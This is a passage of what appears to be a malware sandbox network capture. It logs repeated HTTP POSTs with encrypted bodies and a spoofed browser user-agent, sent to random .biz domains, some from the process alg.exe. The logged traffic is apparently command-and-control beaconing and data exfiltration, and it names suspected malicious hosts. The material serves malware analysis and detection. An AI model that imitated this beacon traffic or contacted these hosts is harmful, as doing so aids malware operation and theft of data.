                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.827819109 CET778OUTData Raw: c8 47 75 95 28 ca 45 5d fe 02 00 00 77 6f 0b a3 61 c7 14 5d 58 96 54 cc d2 6d 89 fa ea 79 f6 c9 f6 4e 8f 06 da 53 61 16 23 a3 db 30 fc 32 39 3b f8 23 fa 92 e0 ed 08 76 07 45 e1 45 f9 cc 6e 93 05 0c 15 26 75 4e 60 fb f6 5e 7b d3 3a ba cd 25 d1 a0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Gu(E]woa]XTmyNSa#029;#vEEn&uN`^{:%})93?0p/R2<t_ekM0&QKp4EGfa<]Ihs)^srC^Gd>Ag1u'$q$,Q9]-G%OP`[+{D#8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.522224903 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=998ace3b0656627aef46e29f1a5f310d|155.94.241.187|1731920371|1731920371|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        120192.168.2.10500993.94.10.3480
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.847132921 CET359OUTPOST /xfpfkqjakhgaed HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.847132921 CET834OUTData Raw: cd 4b b3 82 f2 3a 03 76 36 03 00 00 a4 5a 63 46 92 a3 92 30 ed 0c 54 f7 92 01 90 e9 fe 25 e6 5d 75 02 0d 23 6a c6 b7 c5 e0 86 29 83 c5 44 e8 b3 4f 8e 27 74 7c 83 54 df 0e 8e c1 31 8f 47 47 80 f8 84 18 54 6c 42 88 7a a1 5a ef 8c e6 19 67 9c bb eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K:v6ZcF0T%]u#j)DO't|T1GGTlBzZgh-{|kUq3B0rOLc!K`|ol@[<k%>YrRdA><5;|)<*g ^htH~'$[^"-5?W
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.542630911 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6e1995f82b987f5976395042b2ac8ee3|155.94.241.187|1731920371|1731920371|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        121192.168.2.105010018.246.231.12080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.597117901 CET353OUTPOST /enixguayej HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.597150087 CET834OUTData Raw: 2d fa 69 89 0f 3d 27 fb 36 03 00 00 a6 af 9a ff 21 1d b3 b0 6e 57 e8 39 e8 b0 f5 57 12 92 57 c6 58 b1 9b f9 3e 50 3a 58 c9 93 64 6b f5 64 82 b2 ef b3 8f fc f6 00 6c b8 ff bc 88 ae 97 0f a3 cc 64 c6 9f 22 20 c4 dc d8 ec a5 84 e3 83 75 af df 2d 0d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -i='6!nW9WWX>P:Xdkdld" u-.2"Q["X"kB1>{F!zPK8j$4?\|JEEhZ$Y-'%-7iV]-&#3+wgu^*)d_~oeWG7CS5Pqo;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.443185091 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=612566ed6f6c71c6f4463cc1447ca996|155.94.241.187|1731920372|1731920372|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        122192.168.2.105010134.211.97.45807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849193096 CET344OUTPOST /ae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:31.849193096 CET778OUTData Raw: 09 6c 41 bb 8f ba f0 18 fe 02 00 00 60 cc 3f 19 8b b2 6f ea a8 21 d7 a5 03 e8 74 66 92 7b be 31 06 ab 82 19 a1 f9 ed b7 8c a3 31 79 19 4e b7 50 73 fb 57 f9 d7 06 4a c4 8e 71 53 b2 d2 8c 0a 04 cc 27 a9 9e 5b 93 db 08 ca ac 42 8c 21 2c e4 d7 19 ea
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lA`?o!tf{11yNPsWJqS'[B!,+-K:dD_m3/yf@~S@sE=I2{*R4vF{kFivL}:?gVrv+kVhS|68BNfieqnR?4[VY7Xh
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.740752935 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c9f0937500275c0adafbd66c6ff61850|155.94.241.187|1731920372|1731920372|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        123192.168.2.10501023.254.94.18580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470851898 CET349OUTPOST /olaxecwr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470865965 CET834OUTData Raw: 87 7b 52 26 52 c2 c8 20 36 03 00 00 51 9b 7e 85 ef 84 12 f1 e6 aa df ba 76 96 67 8c 4e b0 c7 8e 54 9b 36 d3 8b a4 23 89 56 73 03 9d 5d 80 31 e6 5a 93 6b 46 08 d5 53 97 5b 21 10 5c 31 62 6c 6a 7f 89 82 59 16 2d 0a 67 60 73 17 ca 87 27 a6 60 e1 d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {R&R 6Q~vgNT6#Vs]1ZkFS[!\1bljY-g`s'`x4hs#*tx5['Q{'{~oPAC@w%gEg'D3t"jgMGHH&\Mn}Q}10Qb-6f<qTbJL-*=,t
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.446110010 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c3bf7ac60e8716f1681213b9dfc20218|155.94.241.187|1731920373|1731920373|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        124192.168.2.105010318.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041922092 CET347OUTPOST /hb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041944027 CET778OUTData Raw: aa f3 7c 61 26 ae ff fa fe 02 00 00 a4 50 1f 13 5d 2d 67 71 8e a4 06 06 58 9c 46 79 8e 8d 8e 03 0e 04 dd c6 71 e8 55 68 1a 1d 3d ee 07 22 17 b4 0b e1 6c 28 35 a8 3d 55 f4 ce ff 5b b4 91 53 da fd 61 3a c6 f6 25 b9 72 ea 42 c2 b3 15 f4 76 51 d1 0d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |a&P]-gqXFyqUh="l(5=U[Sa:%rBvQ|/aOr<[p?bPCRb~k^;ylwtNr4+$Z%2,!YsdE)[lt4[t(Nx,\bCQ&HE.rh+(ri
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.731667995 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=41e70c37423820b4c0ca060cb786b936|155.94.241.187|1731920373|1731920373|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        125192.168.2.105010485.214.228.14080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464350939 CET354OUTPOST /rejcysylgt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464365005 CET834OUTData Raw: 49 72 3d 78 a0 8c cb 75 36 03 00 00 e0 d0 3c 2f 44 94 52 08 15 49 bc f3 3a 43 2d b5 8c 82 7e c5 dd 91 e1 ab 1a 5d 85 ae c8 4d 59 d9 46 1f 44 6a 77 20 d2 c9 5d d0 88 b6 83 fe 69 27 1a 5a 8c 64 23 00 36 f5 36 56 14 10 db d2 cf 24 8b 54 f1 6e 8f 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Ir=xu6</DRI:C-~]MYFDjw ]i'Zd#66V$TnZzBqmI.:|]V==k\/)g(:g`K{UFNt&pv%UNYqn5KfDdg4KwMk {
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.334382057 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 404 page not found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.335889101 CET347OUTPOST /gsd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.335947037 CET834OUTData Raw: 72 29 6b 20 85 fd 0e 20 36 03 00 00 25 a4 7c d3 69 a8 a4 5d 4a 49 4f cb 6f 3b 0a 21 ff 29 d0 f9 62 40 ee 9f 04 8f e9 f3 48 b9 68 69 6a 80 a1 21 01 1f 3f 4e ce 40 4e f5 ff 64 ff 57 52 86 cc a6 20 f3 58 f7 d0 06 51 05 1d 77 45 93 91 a0 59 ce a3 16
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r)k 6%|i]JIOo;!)b@Hhij!?N@NdWR XQwEY%$+[?g@(8o1E_V{b|CWas#]w]@6eQl\.iS}"Sr\/KWqC[yfDxrY[FTz^
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.599811077 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 404 page not found


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        126192.168.2.10501053.254.94.185807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.973964930 CET355OUTPOST /luiqxxselqgi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.973992109 CET778OUTData Raw: e9 33 82 bd 8a db 2f 0c fe 02 00 00 60 b0 5a 84 33 0d a1 f0 9e 0e 8a 4d d3 f6 59 18 84 e3 d7 a6 82 f0 78 50 6c 76 dd 65 6a 07 fe 05 ae 16 31 22 e9 4f 39 44 bb 9f dd 6e ed 81 4d ca cd 7e 6a 22 20 26 b4 0f 06 41 48 9e 16 11 9a 10 aa 06 f0 f4 93 6a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3/`Z3MYxPlvej1"O9DnM~j" &AHj!)96-wJYMxqDe>"&w9:YA6mdpU4y@y%|sKZllfU0|jlyb
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.936739922 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=903a41757afc21d39576d0473596c05a|155.94.241.187|1731920374|1731920374|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        127192.168.2.105010647.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.621809006 CET355OUTPOST /ikgnytocxhbn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.621815920 CET834OUTData Raw: 0b 34 eb 5e ab 87 9d 8c 36 03 00 00 ec 46 45 b8 11 ae 5e 85 fb aa 36 27 25 da 1a d0 bc 1d 71 9c cb 22 56 30 66 37 74 4f 6a a6 26 98 9a 41 c4 81 d3 dd c3 62 f4 9b c5 3a 38 38 e1 ac 7e 62 d0 a0 88 1f eb 1d 1e 6f 67 df 5e 28 53 1a f1 03 54 e5 4b 85
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 4^6FE^6'%q"V0f7tOj&Ab:88~bog^(STKVu>5iZF8N"U+MH6<xfp>q-&=ym4@ihTem[p+Jc:vGD1oqW0T=Ro% `6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.088676929 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=05d43ec64911a2c9c603733e41dd05d0|155.94.241.187|1731920375|1731920375|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        128192.168.2.105010754.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.130541086 CET353OUTPOST /sjbqcomcuhgq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
